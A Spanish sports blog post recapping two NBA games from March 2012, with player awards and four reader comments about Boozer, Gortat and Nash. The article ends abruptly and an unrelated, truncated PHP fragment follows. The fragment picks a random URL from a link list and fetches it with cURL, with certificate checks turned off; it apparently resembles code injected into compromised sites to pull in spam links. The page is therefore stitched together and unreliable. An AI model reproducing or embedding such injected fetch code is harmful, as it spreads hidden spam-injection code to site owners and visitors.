La Crónica: Derrota contra el peor, victoria contra el mejor

09 de March de 2012 por txusma

Noche de jueves, noche de pocos partidos. Tan solo 2 pero emocionantes, cerrados por menos de 5 puntos de diferencia.

Orlando se impuso a Chicago a domicilio en una exhibición de tenacidad y con un Howard desatado (99-94). Hasta 2 veces Rose y los suyos les remontaron 10 puntos de diferencia durante el partido y llegaron a ponerse por delante a escasos 3 minutos para el final. Típica situación en la que el equipo de casa acaba llevándose el gato al agua pero esta vez los Magic sacaron a relucir su calidad y con un parcial de 8-1 cerraron el partido. Gran victoria que llega justo después de una derrota durísima frente el peor equipo de la liga, los Charlotte Bobcats.

En el otro encuentro de la noche, los Suns por fin se impusieron a los Mavs después de 8 derrotas consecutivas (94-96). Su última victoria databa del 28 de Enero de 2010 y ayer pudieron sacarse la espina. Eso sí, Dallas tuvo en sus manos empatar el partido en los últimos segundos pero Rodrigue Beabouis falló un lanzamiento desde la línea de tiros libres completamente solo. Es la sexta victoria en 8 encuentros de unos Suns que siguen en la carrera de clasificarse para los Playoffs.

PREMIOS

MVP: Dwight Howard fue el mejor de la noche con 29 puntos, 18 rebotes y 3 tapones.

Sorpresa: Jared Dudley se ha convertido con el tiempo en un jugador muy sólido como demuestran los 18 puntos y 8 rebotes que consiguió anoche.

Decepción: Mal día para Luol Deng. Se quedó en un 1 de 9 en tiros de campo y 5 puntos.

Esfuerzo en vano: Carlos Boozer fue el que más cara plantó a los Magic con 26 puntos, 7 rebotes y 4 robos, insuficientes para llevarse la victoria.

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. Lucho dice:
    #1

    Que Boozer sea el mayor esfuerzo en vano de una jornada, lo pone automaticamente en sorpresa tambien? xD

      Citar

  2. Nacho dice:
    #2

    Lucho: Que Boozer sea el mayor esfuerzo en vano de una jornada, lo pone automaticamente en sorpresa tambien? xD

    Amén, aunque la jornada haya sido de dos partidos, sería sorpresa hasta si jugara el solo.

      Citar

  3. Denise dice:
    #3

    Por qué eres tan bueno Marcin Gortat? Que pedazo de jugador, top 5 de Centers sin duda, cuando muchos se burlaban de mi en aquellos tiempos en los que jugaba 12 minutillos de suplente de Howard y yo decía que era un crack.

    Y gran victoria de Orlando en el United Center. Lo mejor de la victoria fue que se repuso a varios arreones de los Bulls. Y que partidazo de Jameer Nelson ante nada más y nada menos que Derrick Rose.

      Citar

  4. Sancho88 dice:
    #4

    Gortat se ha visto claramente beneficiado por Nash, en otros equipos no le pasarían tanto la bola, eso hay que reconocerlo. Si Nash hace bueno en ocasiones hasta al cacho de carne de Robin López… pero sí, definitivamente es un jugador inteligente, que sabe lo que tiene que hacer en todo momento, y sabe lo que no tiene que hacer. Temporadón de Gortat, efectivamente. A las chita callando, espero que dentro de diez años no haya gente que le recuerde por ser un blanco grandote y malo, porque la historia distorsiona mucho a los jugadores… seguro que de todos los que nos reímos aquel día, alguno no fue tan malo. Yo solo les recuerdo del NBA Live, ejejej

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>